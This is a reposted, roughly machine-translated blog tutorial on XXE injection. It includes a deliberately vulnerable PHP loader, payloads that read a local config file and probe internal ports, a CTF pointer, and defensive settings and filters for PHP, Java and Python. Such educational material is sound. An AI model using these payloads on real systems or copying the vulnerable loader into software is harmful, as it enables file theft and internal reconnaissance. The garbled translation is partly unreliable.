The basis of penetration of the road - XXE Injection Vulnerability

Others 2019-09-19 05:45:38 views: null

XXE Vulnerability

XXE stands for XML External Entity Injection vulnerability that is xml external entity injection vulnerability, XXE vulnerabilities occur when the application parses the XML input, there is no prohibition to load external entity, leading to load malicious external file, causing the file to read, command execution, network port scanning, network sites in the attack, launched dos attacks and other hazards. Xxe vulnerability trigger point often can upload the xml file location, no xml file upload filtering, leading to upload malicious xml file.

Similar to the file that contains the vulnerability - by loading the XML file and call the configuration file to implement injection

Create a loophole in the code:

<?php
$xml=$_GET['x'];
$data=simplexml_load_file($xml);
var_dump($data);
?>

simplexml_load_file php resolve external entity shall php << 5.5.38

Read arbitrary files

Reading the file.xmlcode is as follows:

<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
    <!ENTITY file SYSTEM "file:///c:/config.ini">
]>
<x>&file;</x>
<!-- 引用外部实体 -->

access http://192.168.80.128/test/xml/test.php?x=file.xml

Port Scan

Read port.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root>
<name>&xxe;</name>
</root>

access http://192.168.80.128/test/xml/test.php?x=port.xml

No error, indicates that the interface and open

If the port to be non-existent 180

access http://192.168.80.128/test/xml/test.php?x=port.xml

A CTF title

http://web.jarvisoj.com:9882/

  • Return information json format

  • Then burp packet capture analysis

  • Try to inject xml, retransmission packet capture

XML use the back door

php dynamically create xml, backdoor

Defense XXE attack

Use development language provide a method to disable external entities

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

Filtering XML data submitted by users

Filter (s): <DOCTYPE and <ENTITY, or, SYSTEM and PUBLIC!!.

It does not allow XML DTD contains its own definition of

https://www.cnblogs.com/miyeah/p/4526088.html

The introduction of an external DTD file

Writing XML code injection

access http://192.168.80.128/test/xml/test.php?x=xxe-dtd.xml

File information can be read out using the read file reached

Guess you like

Origin www.cnblogs.com/r0ckysec/p/11532013.html
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com